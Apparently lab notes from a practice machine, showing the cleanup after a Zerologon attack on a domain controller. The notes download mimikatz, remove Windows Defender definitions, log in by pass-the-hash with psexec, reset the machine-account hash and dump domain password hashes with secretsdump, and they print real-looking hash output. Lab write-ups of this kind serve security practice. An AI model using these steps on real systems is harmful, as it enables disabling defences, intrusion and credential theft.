1. Download Mimkatz
	wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.7z
	7z x mimikatz_trunk.7z

2. If windows defender or any AV enabled disable definitions so that mimikatz is not removed.
	psexec.py administrator@10.10.10.179 -hashes aad3b435b51404eeaad3b435b51404ee:69cbf4a9b7415c9e1caf93d51d971be0
	cd /Progra~1
	cd "Windows Defender"
	MpCmdRun.exe -RemoveDefinitions -All
	put mimikatz.exe
	copy c:\Windows\mimikatz.exe \Programdata
	cd \Programdata
	#### Test Mimikatz #####
	.\mimikatz.exe exit
OUTPUT:
================================================================================================
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # exit
Bye!
================================================================================================
	.\mimikatz.exe "lsadump::setntlm /user:MULTIMASTER$ /ntlm:076ded32a2510e506c97fcc197976732" "exit"

3. Now run secretsdump to see if you can dump the hashes, if you can't it means it worked
	secretsdump.py -just-dc -no-pass MULTIMASTER\$@10.10.10.179
	Impacket v0.9.22.dev1+20201112.141202.d1ced941 - Copyright 2020 SecureAuth Corporation

	[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
	[*] Cleaning up... 

4. Rerunning secretsdump.py as administrator and dumping the password hash history should show that
   the 1000 user has had its password reverted.
	Example:
		secretsdump.py -just-dc -hashes aad3b435b51404eeaad3b435b51404ee:69cbf4a9b7415c9e1caf93d51d971be0 administrator@10.10.10.179 -history

##### OUTPUT AFTER RUNNING ZERO LOGON #########
MULTIMASTER$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
MULTIMASTER$_history0:1000:aad3b435b51404eeaad3b435b51404ee:076ded32a2510e506c97fcc197976732:::
MULTIMASTER$_history1:1000:aad3b435b51404eeaad3b435b51404ee:e0941e061487ad1c5238b3f107643cc8:::
MULTIMASTER$_history2:1000:aad3b435b51404eeaad3b435b51404ee:899c6c0b2837be4797131d4073805fb6:::
MULTIMASTER$_history3:1000:aad3b435b51404eeaad3b435b51404ee:1c8f2ed2b20ca8e6c3260085a9b8db53:::

#### OUTPUT AFTER RUNNING MIMIKATZ and REVERTING PASSWORD ##############
MULTIMASTER$:1000:aad3b435b51404eeaad3b435b51404ee:076ded32a2510e506c97fcc197976732:::
MULTIMASTER$_history0:1000:aad3b435b51404eeaad3b435b51404ee:bdb6d3391c9d130391bf2fc08d3c67db:::
MULTIMASTER$_history1:1000:aad3b435b51404eeaad3b435b51404ee:076ded32a2510e506c97fcc197976732:::
MULTIMASTER$_history2:1000:aad3b435b51404eeaad3b435b51404ee:e0941e061487ad1c5238b3f107643cc8:::
MULTIMASTER$_history3:1000:aad3b435b51404eeaad3b435b51404ee:899c6c0b2837be4797131d4073805fb6:::
MULTIMASTER$_history4:1000:aad3b435b51404eeaad3b435b51404ee:1c8f2ed2b20ca8e6c3260085a9b8db53:::

